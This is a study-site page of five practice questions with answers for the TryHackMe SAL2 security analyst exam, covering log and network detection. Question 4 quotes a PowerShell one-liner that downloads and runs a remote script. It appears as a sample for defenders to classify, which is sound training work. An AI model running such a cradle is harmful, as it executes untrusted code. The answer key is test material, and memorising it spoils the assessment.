Question 1
An analyst reviewing Splunk logs notices a user account performed 47 failed logins followed by one successful login, then immediately ran 'net localgroup administrators' and 'whoami /all'. Which attack stage does this sequence most likely represent?
Correct Answer:
Successful brute-force followed by post-exploitation discovery
Question 2
When performing DFIR on a Windows system, an analyst wants to determine what processes were running at the time of a suspected compromise. Which artifact provides process creation history including command-line arguments?
Correct Answer:
Windows Security Event Log — Event ID 4688
Question 3
In a Wireshark capture, an analyst observes a host sending DNS TXT record queries for long, randomized subdomain strings of 60+ characters under a single parent domain at a rate of 20 queries per minute. What is the most likely malicious activity?
Correct Answer:
DNS tunneling used for data exfiltration or C2 communication
Question 4
An analyst is investigating a Splunk alert for an Elastic agent that flagged PowerShell executing an encoded command. The decoded base64 reveals: 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.5.12/a.ps1")'. What MITRE ATT&CK technique does this represent?
Correct Answer:
T1059.001 — PowerShell with T1105 Ingress Tool Transfer
Question 5
During a Splunk investigation, which search best identifies accounts that successfully authenticated to multiple unique hosts within a 10-minute window — a pattern indicative of lateral movement?
Correct Answer:
index=windows EventCode=4624 | stats dc(ComputerName) as host_count by user | where host_count > 3
Question 1
Exam overview

About this Exam

Prepare with the SAL2 Practice Questions - TryHackMe Security Analyst Level 2 (SAL2) Exam practice quiz. This question bank includes 100 questions covering analyst, windows, file, threat, and alert. Use it to review important concepts, identify knowledge gaps, and build confidence for the related exam, course, or assessment.

More details

Additional Information

SAL2 Practice Questions - TryHackMe Security Analyst Level 2 (SAL2) Exam

This practice set contains 100 questions from the matching question bank and focuses on analyst, windows, file, threat, and alert. Work through each question carefully, review the provided solutions, and revisit topics that need more study before your next attempt.

This is an independent study resource intended for practice and review; it is not an official examination or an endorsement by any organization named in the title.

Quiz information

Frequently Asked Questions

The complete question count is available after full access is unlocked.
No fixed duration is currently configured for this quiz.
Question explanations are included where they are available in the quiz content, helping you review the reasoning after answering.
Yes. You can retake the practice test again as you continue studying during your available access period.
After your access is confirmed, you can continue into the complete practice exam from this quiz flow.
Unless explicitly stated otherwise, this page provides independent practice material for study and exam preparation and is not the official examination itself.
Keep studying

Related Questions